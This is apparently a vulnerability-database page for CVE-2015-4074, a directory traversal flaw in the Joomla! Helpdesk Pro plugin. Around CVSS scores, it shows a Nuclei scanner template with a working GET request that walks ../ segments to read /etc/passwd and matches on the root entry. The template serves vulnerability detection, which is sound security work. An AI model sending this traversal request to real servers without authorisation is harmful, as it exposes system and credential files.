Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2015-4074
HistoryAug 16, 2022 - 2:43 a.m.

Joomla! Helpdesk Pro plugin <1.4.0 - Local File Inclusion

2022-08-1602:43:40
ProjectDiscovery
github.com
4
cve2015
local file inclusion
packetstormsecurity
joomla
plugin
helpdesk_pro_project
exploit-db
severity-high

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

0.006 Low

EPSS

Percentile

78.5%

Directory traversal vulnerability in the Helpdesk Pro plugin before 1.4.0 for Joomla! allows remote attackers to read arbitrary files via a … (dot dot) in the filename parameter in a ticket.download_attachment task.

id: CVE-2015-4074

info:
  name: Joomla! Helpdesk Pro plugin <1.4.0 - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: Directory traversal vulnerability in the Helpdesk Pro plugin before 1.4.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the filename parameter in a ticket.download_attachment task.
  impact: |
    An attacker can exploit this vulnerability to read sensitive files on the server.
  remediation: |
    Upgrade to Joomla! Helpdesk Pro plugin version 1.4.0 or later to fix the local file inclusion vulnerability.
  reference:
    - https://packetstormsecurity.com/files/132766/Joomla-Helpdesk-Pro-XSS-File-Disclosure-SQL-Injection.html
    - https://www.exploit-db.com/exploits/37666/
    - https://nvd.nist.gov/vuln/detail/CVE-2015-4074
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4074
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2015-4074
    cwe-id: CWE-22
    epss-score: 0.00598
    epss-percentile: 0.78367
    cpe: cpe:2.3:a:helpdesk_pro_project:helpdesk_pro:*:*:*:*:*:joomla\!:*:*
  metadata:
    max-request: 1
    vendor: helpdesk_pro_project
    product: helpdesk_pro
    framework: joomla\!
  tags: cve2015,cve,lfi,packetstorm,edb,joomla,plugin,helpdesk_pro_project,joomla\!,xss

http:
  - method: GET
    path:
      - "{{BaseURL}}/?option=com_helpdeskpro&task=ticket.download_attachment&filename=/../../../../../../../../../../../../etc/passwd&original_filename=AnyFileName.exe"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100858bd9184ab4903ccc7d5fa3c75fd32dc9262c548751d820e7c72d49c59bcc4e02204c3c23267a39aa31540f8ee763a21847dc7d465a33cbfb9763ac7562f8adbbf6:922c64590222798bb761d5b6d8e72950

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

0.006 Low

EPSS

Percentile

78.5%